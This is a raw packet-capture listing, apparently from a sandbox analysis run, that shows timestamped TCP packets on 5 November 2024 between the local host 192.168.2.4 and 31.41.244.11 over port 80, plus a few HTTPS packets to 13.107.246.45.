Nov 5, 2024 18:46:10.820774078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820787907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820801020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820806026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820816040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820821047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820832968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820857048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820902109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820914030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820924997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820936918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820945024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820976019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821338892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821351051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821362019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821383953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821391106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821400881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821402073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821413040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821424961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821433067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821476936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821477890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821501970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821513891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821523905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821554899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821553946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821573973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821585894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821595907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821598053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821607113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821618080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821620941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821656942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821710110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821719885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821731091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821743011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821753025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821753979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821765900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821779013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821784019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821784019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821790934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821805000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821827888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821908951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821919918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821937084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.821962118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.821978092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822004080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822052956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822182894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822223902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822241068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822253942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822285891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822313070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822324038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822336912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822355986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822356939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822369099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822377920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822380066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822401047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822412968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822541952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822554111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822563887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822576046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822587967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822590113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822598934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822609901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.822612047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822618961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.822649002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.832149982 CET	443	49822	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.832395077 CET	443	49822	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.832458973 CET	49822	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.832498074 CET	49822	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.832510948 CET	443	49822	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.832520962 CET	49822	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.832525015 CET	443	49822	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.834950924 CET	443	49824	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.835284948 CET	49827	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.835309029 CET	443	49827	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.835596085 CET	49824	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.835611105 CET	443	49824	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.835799932 CET	49827	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.835917950 CET	49827	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.835932016 CET	443	49827	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.836034060 CET	49824	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.836040020 CET	443	49824	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.861670017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.861816883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.861829042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.861888885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.861941099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.904083014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.904095888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.904107094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.904179096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.910480976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910520077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910532951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910562038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.910588026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.910635948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910650969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910662889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910674095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910682917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.910686016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910705090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.910723925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.910726070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910737038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910748959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910759926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910767078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.910768986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.910789967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.910815954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.911736012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.911789894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.911792994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.911806107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.911823988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.911839962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.911848068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.911859035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.911874056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.911880970 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.911885023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.911896944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.911915064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912025928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912036896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912049055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912059069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912074089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912075996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912111998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912111998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912132025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912144899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912157059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912168980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912170887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912179947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912185907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912195921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912208080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912213087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912247896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912250996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912281990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912282944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912298918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912309885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912342072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912400007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912410975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912424088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912434101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912447929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912451982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912462950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912463903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912476063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912487984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912489891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912513018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912535906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912600040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912611008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912621975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912633896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912646055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912674904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912683010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912693024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912703991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912714005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912724018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912724018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912765026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912767887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912767887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912777901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912789106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.912815094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912832975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.912987947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913007021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913016081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913033962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.913048029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.913137913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913149118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913160086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913180113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.913196087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.913201094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913214922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913227081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913237095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.913252115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.913316965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.913324118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913333893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913340092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913347006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913352966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913405895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.913408995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.913476944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.922933102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923000097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923104048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923115015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923125982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923136950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923152924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923165083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923177958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923191071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923202038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923211098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923258066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923258066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923258066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923258066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923258066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923258066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923300982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923321009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923324108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923341990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923343897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923353910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923358917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923365116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923377037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923384905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923396111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923404932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923427105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923448086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923495054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923505068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923515081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923530102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923540115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923547983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923561096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923576117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923641920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923681974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923693895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923707962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923717976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923728943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923738956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923739910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923753023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923763990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923765898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923780918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923796892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.923944950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923958063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923965931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.923991919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924015999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924034119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924045086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924057961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924067020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924081087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924087048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924088001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924145937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924165010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924175024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924186945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924197912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924209118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924216986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924227953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924240112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924254894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924264908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924274921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924292088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924302101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924318075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924329996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924331903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924362898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924376011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924386024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924393892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924396992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924413919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924443007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924510956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924526930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924537897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924547911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924566984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924583912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924611092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924619913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924629927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924642086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924650908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924671888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924688101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924698114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924709082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924721003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924737930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924740076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924762011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924768925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924824953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924833059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924844027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924855947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924863100 CET	49804	80	192.168.2.4	31.41.244.11
